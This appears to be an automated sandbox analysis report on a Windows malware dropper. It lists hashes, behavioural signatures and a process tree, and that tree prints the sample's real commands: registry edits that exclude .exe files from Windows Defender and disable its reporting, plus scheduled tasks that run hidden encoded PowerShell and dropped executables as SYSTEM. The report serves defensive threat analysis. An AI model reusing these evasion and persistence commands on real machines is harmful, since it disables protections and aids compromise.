Analysis
-
max time kernel
162s -
max time network
268s -
platform
windows10-1703_x64 -
resource
win10-20240221-en -
resource tags
arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system -
submitted
11/03/2024, 04:49
Static task
static1
Behavioral task
behavioral1
Sample
69edf5bc7cfc6f908ec250010c760bf8d72c8ebf10cb43293a3792bd2a416c9f.exe
Resource
win7-20240221-en
General
-
Target
69edf5bc7cfc6f908ec250010c760bf8d72c8ebf10cb43293a3792bd2a416c9f.exe
-
Size
7.3MB
-
MD5
54efc154564665c610f78b2cd81a02bf
-
SHA1
8026cf00437c1a905fc839045c71a8cf0403dfef
-
SHA256
69edf5bc7cfc6f908ec250010c760bf8d72c8ebf10cb43293a3792bd2a416c9f
-
SHA512
e24c35b98f2fc3538dd20b93251e5b765637dea30e1c172529b5d749612e4249fdf4f91a5123fb5207576cf462a3ddd1588d034518b2d3d56bb88925b1dc842a
-
SSDEEP
196608:91OaLN6EcMUldo+6ppll/GF3dfPIdzc6xGQVYhNUHWggmE:3OaLNBUdqppHOF3dnIdzcEQyJE
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 29 4660 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2852630833-2010812756-3750823755-1000\Control Panel\International\Geo\Nation UVMjdTq.exe -
Executes dropped EXE 4 IoCs
pid Process 4712 Install.exe 1836 Install.exe 4760 NdyFUwl.exe 4996 UVMjdTq.exe -
Loads dropped DLL 1 IoCs
pid Process 4660 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json UVMjdTq.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json UVMjdTq.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini UVMjdTq.exe -
Drops file in System32 directory 34 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\D4579ED561AFE0AD26F688A8C9A41CC6 UVMjdTq.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\D4579ED561AFE0AD26F688A8C9A41CC6 UVMjdTq.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2D UVMjdTq.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol NdyFUwl.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini NdyFUwl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_F335A0F859C450629B87083CAA1DC971 UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UVMjdTq.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 UVMjdTq.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_A2CFFC3C54D475112D9FC5039EB0095F UVMjdTq.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\PfAJhYIlZmRkYHrSfiR\UlhkHix.xml UVMjdTq.exe File created C:\Program Files (x86)\qbZbgwPoqPUn\ZOjZhcu.dll UVMjdTq.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UVMjdTq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UVMjdTq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja UVMjdTq.exe File created C:\Program Files (x86)\rqFQbjXchIPU2\XQvhjvXhLUrEa.dll UVMjdTq.exe File created C:\Program Files (x86)\rqFQbjXchIPU2\vhVqaYM.xml UVMjdTq.exe File created C:\Program Files (x86)\AwpsUBzCgDaiC\wBSsQcq.xml UVMjdTq.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UVMjdTq.exe File created C:\Program Files (x86)\dKjZUQIlU\QhvhUE.dll UVMjdTq.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi UVMjdTq.exe File created C:\Program Files (x86)\dKjZUQIlU\lUEmPGd.xml UVMjdTq.exe File created C:\Program Files (x86)\PfAJhYIlZmRkYHrSfiR\NQloCVV.dll UVMjdTq.exe File created C:\Program Files (x86)\AwpsUBzCgDaiC\dvwRLMF.dll UVMjdTq.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\djzsCuSYobhMFkMDx.job schtasks.exe File created C:\Windows\Tasks\byGghvRStpVIiJkbMC.job schtasks.exe File created C:\Windows\Tasks\yJubGAGSNRimfkjrP.job schtasks.exe File created C:\Windows\Tasks\gwDSsSBQbdgEwRb.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1904 schtasks.exe 4416 schtasks.exe 2896 schtasks.exe 312 schtasks.exe 4700 schtasks.exe 4184 schtasks.exe 4660 schtasks.exe 2448 schtasks.exe 356 schtasks.exe 5056 schtasks.exe 2348 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" UVMjdTq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ UVMjdTq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing UVMjdTq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume UVMjdTq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UVMjdTq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{add3a5b1-0000-0000-0000-d01200000000}\NukeOnDelete = "0" UVMjdTq.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix UVMjdTq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" UVMjdTq.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
pid Process 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 4376 powershell.EXE 4376 powershell.EXE 4376 powershell.EXE 1888 powershell.exe 1888 powershell.exe 1888 powershell.exe 3684 powershell.exe 3684 powershell.exe 3684 powershell.exe 2032 powershell.EXE 2032 powershell.EXE 2032 powershell.EXE 2496 powershell.exe 2496 powershell.exe 2496 powershell.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe 4996 UVMjdTq.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4040 powershell.exe Token: SeDebugPrivilege 4376 powershell.EXE Token: SeDebugPrivilege 1888 powershell.exe Token: SeDebugPrivilege 3684 powershell.exe Token: SeDebugPrivilege 2032 powershell.EXE Token: SeDebugPrivilege 2496 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4044 wrote to memory of 4712 4044 69edf5bc7cfc6f908ec250010c760bf8d72c8ebf10cb43293a3792bd2a416c9f.exe 73 PID 4044 wrote to memory of 4712 4044 69edf5bc7cfc6f908ec250010c760bf8d72c8ebf10cb43293a3792bd2a416c9f.exe 73 PID 4044 wrote to memory of 4712 4044 69edf5bc7cfc6f908ec250010c760bf8d72c8ebf10cb43293a3792bd2a416c9f.exe 73 PID 4712 wrote to memory of 1836 4712 Install.exe 74 PID 4712 wrote to memory of 1836 4712 Install.exe 74 PID 4712 wrote to memory of 1836 4712 Install.exe 74 PID 1836 wrote to memory of 4040 1836 Install.exe 76 PID 1836 wrote to memory of 4040 1836 Install.exe 76 PID 1836 wrote to memory of 4040 1836 Install.exe 76 PID 1836 wrote to memory of 1672 1836 Install.exe 78 PID 1836 wrote to memory of 1672 1836 Install.exe 78 PID 1836 wrote to memory of 1672 1836 Install.exe 78 PID 1836 wrote to memory of 1396 1836 Install.exe 80 PID 1836 wrote to memory of 1396 1836 Install.exe 80 PID 1836 wrote to memory of 1396 1836 Install.exe 80 PID 1672 wrote to memory of 3936 1672 forfiles.exe 82 PID 1672 wrote to memory of 3936 1672 forfiles.exe 82 PID 1672 wrote to memory of 3936 1672 forfiles.exe 82 PID 1396 wrote to memory of 3684 1396 forfiles.exe 83 PID 1396 wrote to memory of 3684 1396 forfiles.exe 83 PID 1396 wrote to memory of 3684 1396 forfiles.exe 83 PID 3936 wrote to memory of 2824 3936 cmd.exe 84 PID 3936 wrote to memory of 2824 3936 cmd.exe 84 PID 3936 wrote to memory of 2824 3936 cmd.exe 84 PID 3936 wrote to memory of 3576 3936 cmd.exe 85 PID 3936 wrote to memory of 3576 3936 cmd.exe 85 PID 3936 wrote to memory of 3576 3936 cmd.exe 85 PID 3684 wrote to memory of 5060 3684 cmd.exe 86 PID 3684 wrote to memory of 5060 3684 cmd.exe 86 PID 3684 wrote to memory of 5060 3684 cmd.exe 86 PID 3684 wrote to memory of 1724 3684 cmd.exe 87 PID 3684 wrote to memory of 1724 3684 cmd.exe 87 PID 3684 wrote to memory of 1724 3684 cmd.exe 87 PID 1836 wrote to memory of 1904 1836 Install.exe 88 PID 1836 wrote to memory of 1904 1836 Install.exe 88 PID 1836 wrote to memory of 1904 1836 Install.exe 88 PID 1836 wrote to memory of 3828 1836 Install.exe 90 PID 1836 wrote to memory of 3828 1836 Install.exe 90 PID 1836 wrote to memory of 3828 1836 Install.exe 90 PID 4376 wrote to memory of 2704 4376 powershell.EXE 94 PID 4376 wrote to memory of 2704 4376 powershell.EXE 94 PID 1836 wrote to memory of 4060 1836 Install.exe 99 PID 1836 wrote to memory of 4060 1836 Install.exe 99 PID 1836 wrote to memory of 4060 1836 Install.exe 99 PID 1836 wrote to memory of 4416 1836 Install.exe 101 PID 1836 wrote to memory of 4416 1836 Install.exe 101 PID 1836 wrote to memory of 4416 1836 Install.exe 101 PID 4760 wrote to memory of 1888 4760 NdyFUwl.exe 104 PID 4760 wrote to memory of 1888 4760 NdyFUwl.exe 104 PID 4760 wrote to memory of 1888 4760 NdyFUwl.exe 104 PID 1888 wrote to memory of 4268 1888 powershell.exe 106 PID 1888 wrote to memory of 4268 1888 powershell.exe 106 PID 1888 wrote to memory of 4268 1888 powershell.exe 106 PID 4268 wrote to memory of 380 4268 cmd.exe 107 PID 4268 wrote to memory of 380 4268 cmd.exe 107 PID 4268 wrote to memory of 380 4268 cmd.exe 107 PID 1888 wrote to memory of 4984 1888 powershell.exe 108 PID 1888 wrote to memory of 4984 1888 powershell.exe 108 PID 1888 wrote to memory of 4984 1888 powershell.exe 108 PID 1888 wrote to memory of 3580 1888 powershell.exe 109 PID 1888 wrote to memory of 3580 1888 powershell.exe 109 PID 1888 wrote to memory of 3580 1888 powershell.exe 109 PID 1888 wrote to memory of 824 1888 powershell.exe 110 PID 1888 wrote to memory of 824 1888 powershell.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\69edf5bc7cfc6f908ec250010c760bf8d72c8ebf10cb43293a3792bd2a416c9f.exe"C:\Users\Admin\AppData\Local\Temp\69edf5bc7cfc6f908ec250010c760bf8d72c8ebf10cb43293a3792bd2a416c9f.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4044 -
C:\Users\Admin\AppData\Local\Temp\7zS5786.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4712 -
C:\Users\Admin\AppData\Local\Temp\7zS594B.tmp\Install.exe.\Install.exe /pmdidEg "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Get-WmiObject -Namespace root\SecurityCenter2 -Class AntiVirusProduct4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4040
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3936 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:2824
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3576
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1396 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:3684 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:5060
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1724
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "ggBIPjoTC" /SC once /ST 03:29:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:1904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "ggBIPjoTC"4⤵PID:3828
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "ggBIPjoTC"4⤵PID:4060
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "byGghvRStpVIiJkbMC" /SC once /ST 04:50:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wDuQceUSuxrwPBUzz\WGDDUCEGaylPoGy\NdyFUwl.exe\" nw /bZsite_idXqI 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:4416
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4376 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2704
-
-
